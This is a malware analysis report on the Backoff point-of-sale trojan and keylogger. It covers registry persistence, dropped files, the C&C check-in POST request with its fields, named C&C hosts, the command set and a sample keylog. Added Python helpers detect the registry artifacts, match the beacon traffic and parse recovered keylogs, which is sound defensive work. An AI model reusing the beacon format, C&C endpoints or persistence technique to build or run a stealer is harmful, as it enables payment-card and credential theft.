Threat Name
Backoff Malware
Threat Type
Trojan, Keylogger, Stealer
Although this threat has been in the wild for some time, it has recently been reported under the name “Backoff” and is being used to infect the Point-of-Sale (POS) machines of large retail stores in the United States. Its purpose is to steal payment information, particularly credit card data.
The attackers try to plant this threat on POS machines, which mostly run Windows, by hacking or exploiting them to gain access. Once running on an infected system, it attempts to steal personal data (e.g. credit card information) using methods such as memory scraping and keylogging, and then sends the stolen data to the Command and Control (C&C) server it connects to.
TECHNICAL DETAILS
Startup Technique and payload analysis
The malware usually drops a copy of itself in the %APPDATA% folder and creates registry entries in
HKEY_USERS\<some Class ID>\Software\Microsoft\Windows\CurrentVersion\Run
and
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run
so that it runs whenever the infected machine is restarted.
There are now several variants of this threat; their functionality is the same, with small differences in installation and in the C&C server they connect to. The name and version of each can be spotted in the HTTP POST data it sends to the C&C server.
Name: Backoff
Version: 1.55
MD5 – f5b4786c28ccf43e569cb21a6122a97e
When executed, it drops the following files:
“%appdata%\mskrnl” – (this looks like an RC4-encrypted copy of itself)
“%appdata%\AdobeFlashPlayer\mswinhost.exe” – (a copy of itself)
“%appdata%\AdobeFlashPlayer\log.txt” – (a text file where it saves the data logged by its keylogging function)
It also creates the following registry entries:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
identifier = “<random characters>”
HKEY_USERS\S-1-5-21-1060284298-261478967-725345543-500\Software\Microsoft\Windows\CurrentVersion
identifier = “<random characters>”
The above registry value is a randomly generated 7-character string, so it differs with every infection.
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run
Windows NT Service = “%AppData%\AdobeFlashPlayer\mswinhost.exe”
HKEY_USERS\S-1-5-21-1060284298-261478967-725345543-500\Software\Microsoft\Windows\CurrentVersion\Run
Windows NT Service = “%AppData%\AdobeFlashPlayer\mswinhost.exe”
The above registry key makes the threat run at startup.
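The two persistence artifacts listed above (the “Windows NT Service” Run value pointing at mswinhost.exe, and the 7-character “identifier” value) are easy to check for during triage. The following is an added example for incident responders, not code from the report or from the malware: it takes registry values as (key path, value name, value data) tuples, which can come from a .reg export or, on Windows, from the winreg helper at the bottom, and flags the entries that match the profile. The sample entries are constructed for the demonstration.

```python
"""Triage helper for the Backoff persistence artifacts described in the report.

Added example; not code from the report or from the malware. Input is a list
of (key_path, value_name, value_data) tuples. Sample entries are constructed.
"""
import re
import sys

RUN_KEY_SUFFIX = r"\software\microsoft\windows\currentversion\run"
CV_KEY_SUFFIX = r"\software\microsoft\windows\currentversion"
DROPPED_EXE = r"adobeflashplayer\mswinhost.exe"   # dropped file path fragment from the report
RUN_VALUE_NAME = "windows nt service"             # Run value name from the report
IDENT_RE = re.compile(r"^[A-Za-z0-9]{7}$")        # 7 random characters per the report

# Constructed sample: one benign Run entry, the two Backoff artifacts, one benign value.
SAMPLE_ENTRIES = [
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
     "OneDrive", r"C:\Users\pos\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
     "Windows NT Service", r"%AppData%\AdobeFlashPlayer\mswinhost.exe"),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion",
     "identifier", "WgBClNZ"),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion",
     "SomeVendorSetting", "1"),
]


def find_backoff_artifacts(entries):
    """Return a list of dicts describing the entries that match the profile."""
    hits = []
    for key_path, value_name, value_data in entries:
        key = key_path.lower()
        name = value_name.lower()
        data = str(value_data)
        reasons = []
        if key.endswith(RUN_KEY_SUFFIX):
            if name == RUN_VALUE_NAME:
                reasons.append("Run value named 'Windows NT Service'")
            if DROPPED_EXE in data.lower().replace("/", "\\"):
                reasons.append("Run value points at AdobeFlashPlayer\\mswinhost.exe")
        elif key.endswith(CV_KEY_SUFFIX) and name == "identifier":
            # Windows does not normally keep an 'identifier' value here; the
            # 7-character shape is the extra signal the report describes.
            reasons.append("'identifier' value under CurrentVersion")
            if IDENT_RE.match(data):
                reasons.append("identifier is a 7-character random-looking string")
        if reasons:
            hits.append({"key": key_path, "value": value_name,
                         "data": data, "reasons": reasons})
    return hits


def read_current_user_entries():
    """Windows only: enumerate the two HKCU keys with the standard winreg module."""
    import winreg
    entries = []
    for sub in (r"Software\Microsoft\Windows\CurrentVersion\Run",
                r"Software\Microsoft\Windows\CurrentVersion"):
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, sub) as key:
            index = 0
            while True:
                try:
                    name, data, _type = winreg.EnumValue(key, index)
                except OSError:
                    break  # no more values under this key
                entries.append(("HKEY_CURRENT_USER\\" + sub, name, str(data)))
                index += 1
    return entries


if __name__ == "__main__":
    entries = read_current_user_entries() if sys.platform == "win32" else SAMPLE_ENTRIES
    for hit in find_backoff_artifacts(entries):
        print(f"{hit['key']} :: {hit['value']} = {hit['data']}")
        for reason in hit["reasons"]:
            print("   -", reason)
```

The HKEY_USERS\<SID>\... form of the keys matches too, since only the key suffix is compared; the report notes that other variants use different file names and registry entries, so the constants at the top are the part to adjust per variant.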
Communication with C&C
It then tries to connect to its Command and Control (C&C) server and sends the following POST data:
POST /aero2/fly.php HTTP/1.0
Host: <c&c server hostname>
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0
Accept-Language: en-us
Accept-Encoding: text/plain
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
&op=1&id=<random characters>WgBClNZ&ui=<user_name> @ <hostname>&wv=11&gr=backoff&bv=1.55
Where:
op = this seems to always have the value 1
id = randomly generated characters; this is the string saved in the registry entry mentioned above
ui = currently logged-in user name and the hostname of the infected machine
wv = Windows version of the infected machine
gr = possibly the group name of the malware, e.g. “backoff”
bv = version of the malware, “1.55”
C&C server hosts:
pop3smtp5imap2.com/aero2/fly.php
pop3smtp5imap3.com/aero2/fly.php
pop3smtp5imap4.ru/aero2/fly.php
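The check-in request and its field meanings above are enough to write a network-side matcher. The following is an added example for detection engineering, not code from the report or from the malware: it splits a captured HTTP request into request line, headers and form fields, then scores it against the beacon profile the report gives (path /aero2/fly.php, the exact field set op/id/ui/wv/gr/bv, gr=backoff, a 7-character id, a “user @ host” ui value, and the unusual “Accept-Encoding: text/plain” header). The sample request is constructed from the template in the report; the host name, user and machine name are placeholders.

```python
"""Parser and matcher for the Backoff check-in request described in the report.

Added example; not code from the report or from the malware. The sample
request is constructed from the report's template with placeholder values.
"""
from urllib.parse import parse_qs

BEACON_FIELDS = {"op", "id", "ui", "wv", "gr", "bv"}   # field set from the report


def build_sample_request():
    """Constructed request: template from the report, placeholder host/user/machine."""
    body = "&op=1&id=WgBClNZ&ui=posuser @ POS-LANE-01&wv=11&gr=backoff&bv=1.55"
    head = [
        "POST /aero2/fly.php HTTP/1.0",
        "Host: c2.example.invalid",
        "Accept: */*",
        "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0",
        "Accept-Language: en-us",
        "Accept-Encoding: text/plain",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body)}",
    ]
    return "\r\n".join(head) + "\r\n\r\n" + body


def parse_request(raw):
    """Split a raw HTTP request into method, path, lower-cased headers and form fields."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = (lines[0].split(" ") + ["", ""])[:3]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # parse_qs ignores the empty pair produced by the leading '&' in the body
    fields = {k: v[0] for k, v in parse_qs(body).items()}
    return {"method": parts[0], "path": parts[1], "headers": headers, "fields": fields}


def split_ui(ui):
    """The ui field is '<user> @ <hostname>'; return (user, host), host empty if absent."""
    user, sep, host = ui.partition(" @ ")
    return (user.strip(), host.strip()) if sep else (ui.strip(), "")


def backoff_indicators(req):
    """Return the list of profile indicators the parsed request matches."""
    hits = []
    fields = req["fields"]
    if req["path"].lower().endswith("/aero2/fly.php"):
        hits.append("path /aero2/fly.php")
    if set(fields) == BEACON_FIELDS:
        hits.append("exact field set op/id/ui/wv/gr/bv")
    if fields.get("gr") == "backoff":
        hits.append("gr=backoff")
    if len(fields.get("id", "")) == 7:
        hits.append("7-character id")
    if split_ui(fields.get("ui", ""))[1]:
        hits.append("ui is 'user @ host'")
    if req["headers"].get("accept-encoding") == "text/plain":
        hits.append("Accept-Encoding: text/plain (not a content coding)")
    return hits


if __name__ == "__main__":
    req = parse_request(build_sample_request())
    user, host = split_ui(req["fields"]["ui"])
    print(f"beacon from user={user} host={host} version={req['fields'].get('bv')}")
    for indicator in backoff_indicators(req):
        print("   -", indicator)
```

Scoring several weak indicators together rather than matching only the path keeps the rule useful when a variant changes the C&C host or script name, which the report says differs between variants.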
After a successful connection to the C&C server, it receives a reply, which is usually a command or instruction from the server. The usual reply received is the string “Thanks!”, which is probably just an acknowledgement that it has successfully connected to the server.
A “Thanks!” reply looks like this:
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Fri, 01 Aug 2014 22:09:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.28-1~dotdeb.0
Thanks!
Other commands
Other commands that the malware will get from the server are as follows:
* Update – most likely instructs the malware to try to get an updated version
* Terminate – most likely terminates all running instances on the infected machine
* Uninstall – most likely uninstalls or removes everything from the infected machine
* Download and Run – this command most likely carries other data in the response, including a link or location from which to download and execute a certain file
* Upload Keylogs – most likely the command to upload the text file containing the keylogger's logged data (log.txt)
Keylogging Function:
As mentioned, the threat has a keylogging function which logs the name of the currently active window and any keystrokes performed in that window. As an example, the contents of log.txt may look like this:
[Arrow Right][Backspace][Backspace][Backspace]
[Run] – [02/08/2014 17:40:40]
%appdata%[Arrow Down]
[Program Manager] – [02/08/2014 17:40:41]
[Enter]
[about:blank – Microsoft Internet Explorer] – [03/08/2014 16:03:46]
www.bankofamerica.com[Enter]mybogusloginID[Enter]
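When a log.txt is recovered from an infected terminal, the first question for the response team is what was actually captured. The following is an added example, not code from the report or from the malware, that parses the format shown above (a “[window title] – [DD/MM/YYYY HH:MM:SS]” header followed by keystroke lines, with special keys in square brackets) into records and replays the keystrokes so that [Backspace] and [Enter] are applied, giving the text the user ended up typing in each window. The day/month order of the timestamp and the treatment of arrow keys as non-text are assumptions based on the sample; the sample log is the one from the report.

```python
"""Parser for the Backoff keylog (log.txt) format shown in the report.

Added example; not code from the report or from the malware. Assumed format:
a header "[<window title>] – [DD/MM/YYYY HH:MM:SS]" followed by keystroke lines
in which special keys appear as [Enter], [Backspace], [Arrow Down] and so on.
"""
import re
from datetime import datetime

HEADER_RE = re.compile(
    r"^\[(?P<window>.*)\] [\u2013-] \[(?P<ts>\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2})\]$")
# One token per bracketed special key, otherwise one token per literal character.
TOKEN_RE = re.compile(r"\[[^\]]+\]|.", re.DOTALL)

# Sample log.txt content taken from the report.
SAMPLE_LOG = """[Arrow Right][Backspace][Backspace][Backspace]
[Run] – [02/08/2014 17:40:40]
%appdata%[Arrow Down]
[Program Manager] – [02/08/2014 17:40:41]
[Enter]
[about:blank – Microsoft Internet Explorer] – [03/08/2014 16:03:46]
www.bankofamerica.com[Enter]mybogusloginID[Enter]
"""


def parse_keylog(text):
    """Return one record per window header: window, timestamp and the raw keystrokes
    that followed it. Keystrokes before the first header get window None."""
    records = []
    current = {"window": None, "timestamp": None, "keys": ""}
    for line in text.splitlines():
        match = HEADER_RE.match(line)
        if match:
            if current["keys"] or current["window"] is not None:
                records.append(current)
            current = {"window": match.group("window"),
                       "timestamp": datetime.strptime(match.group("ts"), "%d/%m/%Y %H:%M:%S"),
                       "keys": ""}
        elif line:
            current["keys"] += line
    if current["keys"] or current["window"] is not None:
        records.append(current)
    return records


def typed_text(keys):
    """Replay keystrokes: [Backspace] deletes the previous character, [Enter] starts
    a new line, other special keys are dropped because their effect on the cursor
    cannot be recovered from the log. Returns the non-empty lines typed."""
    lines = [[]]
    for token in TOKEN_RE.findall(keys):
        if token == "[Enter]":
            lines.append([])
        elif token == "[Backspace]":
            if lines[-1]:
                lines[-1].pop()
        elif len(token) > 1:
            continue  # arrow keys and other bracketed specials
        else:
            lines[-1].append(token)
    return ["".join(chars) for chars in lines if chars]


def captured_inputs(records):
    """List (window, typed lines) for every record where text was actually entered."""
    result = []
    for record in records:
        lines = typed_text(record["keys"])
        if lines:
            result.append((record["window"], lines))
    return result


if __name__ == "__main__":
    for window, lines in captured_inputs(parse_keylog(SAMPLE_LOG)):
        print(f"[{window}]")
        for line in lines:
            print("   ", line)
```

A bracketed literal such as “[x]” typed by the user is indistinguishable from a special key in this format, so the replay treats every bracketed token as a key; for the sample above that ambiguity does not arise.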
There are multiple variants of the malware which drop differently named files and use different registry entries.